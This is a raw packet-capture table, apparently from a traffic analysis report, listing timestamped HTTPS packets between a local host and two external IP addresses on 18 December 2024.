                                                                                              Dec 18, 2024 13:06:01.893822908 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:01.893867970 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:01.893867970 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.074455023 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.074520111 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.074559927 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.074568033 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.074640036 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.074646950 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.114109039 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.114165068 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.114301920 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.114319086 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.114418030 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.128896952 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.129002094 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.129013062 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.129065990 CET443497313.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.129175901 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.129328966 CET49731443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.137943029 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.137972116 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:02.138047934 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.138407946 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:02.138421059 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:03.962543011 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.018676996 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.024650097 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.024660110 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.720268965 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.768641949 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.770421028 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.770448923 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.770466089 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.770493031 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.770509958 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.770529985 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.770548105 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.770551920 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.770572901 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.770576954 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.770622969 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.770677090 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.815534115 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.950851917 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.950867891 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.950920105 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.950954914 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.950994968 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.951000929 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:04.951034069 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:04.951055050 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.003127098 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.005670071 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.005697012 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.005743980 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.005765915 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.005796909 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.005810976 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.005826950 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.005852938 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.013341904 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.013434887 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.013490915 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.013500929 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.065586090 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.127953053 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.127981901 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.128026962 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.128046989 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.128063917 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.128076077 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.128093958 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.128115892 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.128177881 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.165792942 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.165846109 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.165890932 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.165915012 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.165966034 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.165977001 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.166009903 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.170988083 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.171139002 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.190169096 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.190191031 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.190253973 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.190270901 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.190270901 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.190291882 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.190308094 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.190356970 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.192569017 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.237423897 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.297765017 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.297780991 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.297854900 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.297862053 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.297905922 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.297931910 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.297960997 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.300318956 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.317078114 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.317135096 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.317164898 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.317197084 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.317219019 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.337172985 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.337230921 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.337261915 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.337289095 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.337308884 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.353676081 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.353751898 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.353785992 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.353813887 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.353862047 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.370388985 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.370438099 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.370465040 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.370491982 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.370516062 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.387037992 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.387101889 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.387149096 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.387204885 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.387204885 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.387234926 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.387353897 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.403702974 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.403747082 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.403781891 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.403790951 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.403810024 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.403836966 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.403845072 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.456248045 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.491046906 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.491085052 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.491131067 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.491167068 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.491180897 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.491194963 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.491230011 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.491250992 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.491255999 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.503391981 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.503448009 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.503474951 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.503484964 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.503519058 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.515266895 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.515350103 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.515367031 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.515403032 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.515434027 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.531797886 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.531852961 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.531883955 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.531893969 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.531927109 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.531945944 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.541543007 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.541565895 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.541613102 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.541624069 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.541644096 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.541661024 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.553679943 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.553716898 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.553766966 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.553786039 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.553813934 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.564687967 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.564719915 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.564758062 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.564770937 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.564794064 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.574935913 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.574968100 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.574992895 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.575001955 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.575028896 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.628072023 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.628091097 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.674966097 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.685162067 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.685175896 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.685203075 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.685209990 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.685240030 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.685343027 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.685362101 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.685472012 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.692831993 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.692847967 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.692867041 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.692898989 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.692960024 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.692984104 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.692996025 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.700247049 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.700279951 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.700287104 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.700337887 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.700354099 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.700381041 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.726291895 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.726331949 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.726416111 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.726434946 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.734304905 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.734344959 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.734374046 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.734396935 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.734447956 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.734457970 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.734554052 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.749301910 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.749310017 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.749330044 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.749458075 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.749466896 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.749517918 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.750199080 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.756531000 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.756551027 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.756623030 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.756668091 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.756700993 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.799921036 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.799940109 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.846791983 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.872483969 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872498989 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872526884 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872534990 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872605085 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.872621059 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.872651100 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.872677088 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.873455048 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880829096 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880846024 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880873919 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880898952 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.880907059 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.880959034 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.880966902 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.881110907 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.887876034 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.887892962 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.887953997 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.887964010 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.888008118 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.888015032 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896645069 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896671057 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896708965 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.896718979 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.896753073 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.921789885 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.921840906 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.921960115 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.921988010 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938334942 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938390017 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938412905 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938488007 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.938509941 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.938560009 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.945327044 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945343971 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945424080 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945452929 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.945461988 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.945517063 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.952495098 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.952512026 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.952574968 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.952581882 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.952706099 CET443497433.5.239.146192.168.2.5
                                                                                              Dec 18, 2024 13:06:05.954632044 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:05.955131054 CET49743443192.168.2.53.5.239.146
                                                                                              Dec 18, 2024 13:06:06.235918999 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:06.235955000 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:06.236116886 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:06.236501932 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:06.236512899 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:08.205689907 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:08.207365990 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:08.207376957 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.012892008 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.065644979 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.271927118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271944046 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271965027 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271972895 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.271994114 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.271996975 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.272017002 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.272047997 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.272079945 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733428001 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733464956 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733513117 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733515024 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733540058 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733549118 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733578920 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733591080 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.733633995 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:09.733700037 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:09.784282923 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006635904 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006654978 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006679058 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006691933 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006722927 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006732941 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.006762028 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006773949 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.006778002 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.049957037 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.359816074 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359832048 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359857082 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359899044 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359922886 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.359940052 CET4434974952.95.161.33192.168.2.5
                                                                                              Dec 18, 2024 13:06:10.359972000 CET49749443192.168.2.552.95.161.33
                                                                                              Dec 18, 2024 13:06:10.360034943 CET49749443192.168.2.552.95.161.33
